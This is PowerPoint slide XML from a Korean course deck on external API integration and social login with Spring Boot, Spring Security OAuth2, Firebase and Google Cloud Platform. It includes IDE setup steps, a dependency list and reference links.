            <a:pPr marL="11430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아인슈타인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1678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056" y="30178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80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https://developers.google.com/my-business/content/basic-setup?hl=ko</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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2869064"/>
            <a:ext cx="7463973" cy="295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/>
              <a:t>구글 클라우드 플랫폼 API 연동 사례</a:t>
            </a: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13" name="Google Shape;2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65" y="2533650"/>
            <a:ext cx="2225421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2774" y="2533650"/>
            <a:ext cx="550135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/>
              <a:t>구글 클라우드 플랫폼 API 연동 사례</a:t>
            </a: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166" y="3274785"/>
            <a:ext cx="2225421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2300" y="3274785"/>
            <a:ext cx="5429250" cy="161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/>
              <a:t>구글 클라우드 플랫폼 API 연동 사례</a:t>
            </a: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65" y="2857500"/>
            <a:ext cx="2225421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2306" y="2857500"/>
            <a:ext cx="5599943" cy="33194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342134" y="6351687"/>
            <a:ext cx="2472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https://bcho.tistory.com/1107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구글 Maps 플랫폼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https://developers.google.com/maps?hl=ko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25" y="2951872"/>
            <a:ext cx="3609975" cy="32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938" y="2951872"/>
            <a:ext cx="3881997" cy="328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웹 애플리케이션 개발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383" y="2453498"/>
            <a:ext cx="61245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6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/>
              <a:t>외부 API 연동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66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1150" y="2817610"/>
            <a:ext cx="5981700" cy="308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399223" y="6167021"/>
            <a:ext cx="83455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4차 혁명 시대에 개발자로 살아 남기 위해서  클라우드 플랫폼에 하루 빨리 올라 타야 한다.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3c8bf3e09_0_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 altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>소셜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 로그인</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;g143c8bf3e09_0_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 smtClean="0"/>
              <a:t>과정 실습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소셜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직접 회원가입</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>과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로그인을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 구현 할 경우 배보다 배꼽이 더 커진다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10" y="2651348"/>
            <a:ext cx="4284726" cy="37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7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다양한 소셜 로그인 (참고)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3912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https://drive.google.com/file/d/1R5IK755XAybsS4XsGV4nHJ9gtQgFxvsL/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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300" y="2938463"/>
            <a:ext cx="6957878" cy="2662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161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Firebase Authentication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4" y="2195893"/>
            <a:ext cx="7374827" cy="405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0764" y="1665767"/>
            <a:ext cx="739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Firebase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PaaS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>방</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>식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환경이기 때문에 서버 설정이 복잡하진 않다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957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부트에서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스프링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>시큐리티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OAuth2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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>spring.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/projects/spring-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>oauth</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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2571632"/>
            <a:ext cx="4370832" cy="366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888" y="6404564"/>
            <a:ext cx="6757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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1"/>
              <a:t>www.baeldung.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>/spring-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1"/>
              <a:t>oauth2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1"/>
              <a:t>jws-jwk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139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ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>시큐리티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OAuth2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1" y="2292477"/>
            <a:ext cx="4910326" cy="296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3539" y="6448080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innovationm.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/spring-security-with-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>oauth2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/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8" y="2073355"/>
            <a:ext cx="2771830" cy="340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31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Eclipse2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>-03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>버전에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>STS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플러그인 설치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스프링 부트 전용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800" dirty="0" smtClean="0"/>
              <a:t> Help &gt; Eclipse Marketplace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>STS4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검색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설치 순서 중요 함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Spring Tools 3 Add-On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>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>persipective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>에 아이콘 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>생김</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>STS3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>만 설치 해도 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Spring Tools 4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레거시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 프로젝트 항목이 메뉴에서 사라 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필수 아님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6182357"/>
            <a:ext cx="3019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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>passionha.tistory.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/449</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>https://hello-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bryan.tistory.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/328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043607" y="4293096"/>
            <a:ext cx="1681955" cy="1596072"/>
            <a:chOff x="762553" y="3751148"/>
            <a:chExt cx="2264612" cy="191611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072" y="3751148"/>
              <a:ext cx="1949574" cy="146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2553" y="5218684"/>
              <a:ext cx="2264612" cy="44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만약 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0" err="1" smtClean="0"/>
                <a:t>STS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0" smtClean="0"/>
                <a:t> 3 Add-On </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" smtClean="0"/>
                <a:t>설치 중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오류 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1" smtClean="0"/>
                <a:t>메세지</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" smtClean="0"/>
                <a:t> 뜨면 그냥 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0" smtClean="0"/>
                <a:t>OK</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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667184" y="3343364"/>
            <a:ext cx="2896850" cy="2689550"/>
            <a:chOff x="5220072" y="3450415"/>
            <a:chExt cx="3383434" cy="300476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3450415"/>
              <a:ext cx="3383434" cy="2744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521023" y="6193572"/>
              <a:ext cx="2781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설치 후 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" smtClean="0"/>
                <a:t>Window &gt; Preferences</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" smtClean="0"/>
                <a:t>에서 확인</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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899314" y="3343364"/>
            <a:ext cx="2398819" cy="2745859"/>
            <a:chOff x="283023" y="3423090"/>
            <a:chExt cx="3706455" cy="335487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23" y="3423090"/>
              <a:ext cx="3364929" cy="263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54551" y="6289112"/>
              <a:ext cx="3534927" cy="48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STS3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
                <a:t> Add-On </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>설치 후 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1" smtClean="0"/>
                <a:t>STS4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설치 시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기존 설치 항목 남기기 체크</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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1" y="2747776"/>
            <a:ext cx="1480385" cy="193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85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80727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Gradle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Java Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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780928"/>
            <a:ext cx="3209393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17175"/>
            <a:ext cx="3872657" cy="442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32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Project Lombok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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>projectlombok.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>설치 항목에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>이클립스가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 보이지 않으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Spectify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Location ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>으로 직접 선택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200" dirty="0" smtClean="0"/>
              <a:t>먼저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Lombok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>설치를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>이클립스에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> 해 주어야 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Lombok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>기능 사용 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>중요 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85" y="2852936"/>
            <a:ext cx="2880320" cy="99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52936"/>
            <a:ext cx="4860960" cy="283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4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6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/>
              <a:t>외부 API 연동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웹 애플리케이션 개발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2420888"/>
            <a:ext cx="5449788" cy="397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290892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다음과 같이 의존성 검색 추가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Spring Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>H2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Spring Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>JPA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Lombok</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>DevTools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Mustache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>OAuth2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Jdbc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MariaDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Java Client (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73267"/>
            <a:ext cx="3312369" cy="485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881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Repository </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>디렉토</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>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만일 설정 중 모듈에 문제가 생기거나 실행 중 문제가 있으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>컴퓨터의 저장소 폴더를 제거 한 후에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>이클립스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> 다시 실행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74767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50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server.port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 포트가 충돌 날 경우 변경 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/main/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>resourece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application.properties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>server.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=8088</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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62755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22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 프로젝트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85220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DemoApplication.java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우클릭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Run As &gt; Spring Boot App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>실행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85420"/>
            <a:ext cx="5003968" cy="3912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92" y="1340768"/>
            <a:ext cx="3816424" cy="1675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52" y="3810720"/>
            <a:ext cx="3816424" cy="1422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7154311" y="3140968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실행 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>화면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949256" y="5312241"/>
            <a:ext cx="294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실행 후 브라우저로 접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost:8088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8432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ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>시큐리티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OAuth 2.0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Spring Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Authentication (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>인증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Authorization (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>인가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68235"/>
            <a:ext cx="3061011" cy="446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78269" y="6306263"/>
            <a:ext cx="4824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스프링 부트와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0"/>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>로 혼자 구현하는 웹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>서비스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프리렉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4336"/>
            <a:ext cx="4580148" cy="294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5733256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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 책 소스는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>환경인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.2.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1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와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gradle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1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에서는 정상작동 하지 않습니다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56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en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>OAuth2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스프링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>시큐리티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OAuth2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클라이언트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로그인 시 보안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회원가입 시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>이메일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 혹은 전화번호 인증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비밀번호 찾기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비밀번호 변경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회원정보 변경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8323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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2.0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OAuth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spring-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>oauth2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>autoconfigure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라이브러리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주의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스프링 부트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>와 많이 다름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251520" y="6309320"/>
            <a:ext cx="559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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>velog.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>/@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>wndudrla1011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>/chapter-5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63760"/>
            <a:ext cx="5616624" cy="29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710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플랫폼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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>console.cloud.google.com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7"/>
            <a:ext cx="4180798" cy="352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72" y="2420885"/>
            <a:ext cx="3286885" cy="352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1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클라우드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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GCP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구글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플랫폼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 새 프로젝트 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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" y="2216296"/>
            <a:ext cx="5622392" cy="254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4" y="3933056"/>
            <a:ext cx="5760640" cy="259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5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924945"/>
            <a:ext cx="8219256" cy="1628768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application.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>에 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>spring.h2.console.enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>앱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 실행 후 브라우저로 접속</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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83" y="476672"/>
            <a:ext cx="689737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24944"/>
            <a:ext cx="4073903" cy="342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67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700"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3365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ko-KR" sz="1800"/>
              <a:t>외부 API 연동의 이해</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="74295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ko-KR" sz="1400"/>
              <a:t>JSON 라이브러리</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-2667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네이버 API 연동 활용 사례 분석</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-2794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ko-KR" sz="1400"/>
              <a:t>구글 API 연동 활용사례 분석</a:t>
